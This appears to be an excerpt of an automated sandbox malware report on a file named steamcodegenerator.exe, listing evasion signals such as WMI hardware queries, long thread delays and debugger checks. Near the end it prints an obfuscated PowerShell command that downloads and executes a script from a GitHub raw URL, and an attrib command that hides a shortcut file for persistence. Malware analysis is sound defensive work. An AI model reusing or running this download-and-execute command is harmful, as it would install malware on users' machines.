Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3966Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5820Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5141Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4586Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1794Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4505Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5217Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 952
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5089
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4636
Source: C:\Users\user\Desktop\steamcodegenerator.exeAPI coverage: 8.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4560Thread sleep count: 3966 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep count: 5820 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2360Thread sleep count: 47 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2144Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep time: -16602069666338586s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 404Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4236Thread sleep count: 1794 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1408Thread sleep count: 205 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4600Thread sleep count: 4505 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5712Thread sleep count: 5217 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 356Thread sleep time: -19369081277395017s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2748Thread sleep count: 952 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep count: 183 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4548Thread sleep count: 118 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5392Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep count: 5089 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep count: 4636 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6832Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C070478 FindFirstFileExW,0_2_00007FF71C070478
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000006.00000002.2668833493.000001FBFE571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729DC000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000D.00000002.2858371169.000002B3B4024000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllffzs
Source: powershell.exe, 00000011.00000002.2955482624.000001D19C400000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C061D58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF71C061D58
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C07483C GetProcessHeap,0_2_00007FF71C07483C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C061D58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF71C061D58
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C0595DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF71C0595DC
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C05998C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF71C05998C
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C059B30 SetUnhandledExceptionFilter,0_2_00007FF71C059B30

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\steamcodegenerator.exeNtMapViewOfSection: Indirect: 0x20C7473889AJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeNtMapViewOfSection: Indirect: 0x20C7473835DJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeNtUnmapViewOfSection: Indirect: 0x20C7473882EJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
